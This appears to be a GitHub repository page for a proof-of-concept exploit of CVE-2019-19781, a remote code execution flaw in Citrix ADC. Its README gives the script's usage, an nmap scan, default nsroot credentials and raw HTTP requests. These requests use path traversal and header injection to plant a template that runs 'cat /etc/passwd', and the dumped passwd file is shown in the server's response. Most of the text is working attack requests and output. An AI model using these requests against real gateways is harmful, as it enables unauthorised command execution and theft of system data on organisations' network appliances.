Skip to content
Citrix ADC Remote Code Execution
Python
Branch: master
Clone or download
Latest commit dd39be5 Jan 11, 2020
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
CVE-2019-19781.gif Add files via upload Jan 11, 2020
CVE-2019-19781.py Add files via upload Jan 11, 2020
README.md Update README.md Jan 11, 2020
citrix.png Add files via upload Jan 11, 2020
execute_command.png Add files via upload Jan 11, 2020
nsroot.png Add files via upload Jan 11, 2020
ovf.png Add files via upload Jan 11, 2020
static.png Add files via upload Jan 11, 2020
upload_xml.png Add files via upload Jan 11, 2020
vmware.png Add files via upload Jan 11, 2020

README.md

CVE-2019-19781 Citrix ADC Remote Code Execution

python usage:

python CVE-2019-19781.py http://192.168.3.244

asciicast

0x01 download NSVPX-ESX-13.0-47.22_nc_64.zip

https://www.citrix.com/downloads/citrix-gateway/

configure static networ

0x02 nmap scan

Scanning 192.168.3.244 [65535 ports]
Discovered open port 80/tcp on 192.168.3.244
Discovered open port 22/tcp on 192.168.3.244
Discovered open port 443/tcp on 192.168.3.244

i am not install SSL Certificate

http://192.168.3.244/

default password: nsroot/nsroot

0x03 upload xml

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97

url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:36:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 11 Jan 2020 06:36:44 GMT
ETag: W/"87-59bdd52283e00"
Accept-Ranges: bytes
Content-Length: 135
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>

0x04 execute command

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:37:40 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-control: no-cache
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Expires: Sat, 11 Jan 2020 06:37:40 GMT
Content-Length: 2255

# $FreeBSD: release/8.4.0/etc/master.passwd 243948 2012-12-06 11:54:25Z rwatson $
#
root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/netscaler/nssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin
&#117;&#110;&#100;&#101;&#102;&#32;&#101;&#114;&#114;&#111;&#114;&#32;&#45;&#32;&#65;&#116;&#116;&#101;&#109;&#112;&#116;&#32;&#116;&#111;&#32;&#98;&#108;&#101;&#115;&#115;&#32;&#105;&#110;&#116;&#111;&#32;&#97;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#32;&#97;&#116;&#32;&#47;&#117;&#115;&#114;&#47;&#108;&#111;&#99;&#97;&#108;&#47;&#108;&#105;&#98;&#47;&#112;&#101;&#114;&#108;&#53;&#47;&#115;&#105;&#116;&#101;&#95;&#112;&#101;&#114;&#108;&#47;&#53;&#46;&#49;&#52;&#46;&#50;&#47;&#109;&#97;&#99;&#104;&#47;&#84;&#101;&#109;&#112;&#108;&#97;&#116;&#101;&#47;&#68;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#112;&#109;&#32;&#108;&#105;&#110;&#101;&#32;&#57;&#50;&#46;&#10;

undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.

参考链接

https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/

You can’t perform that action at this time.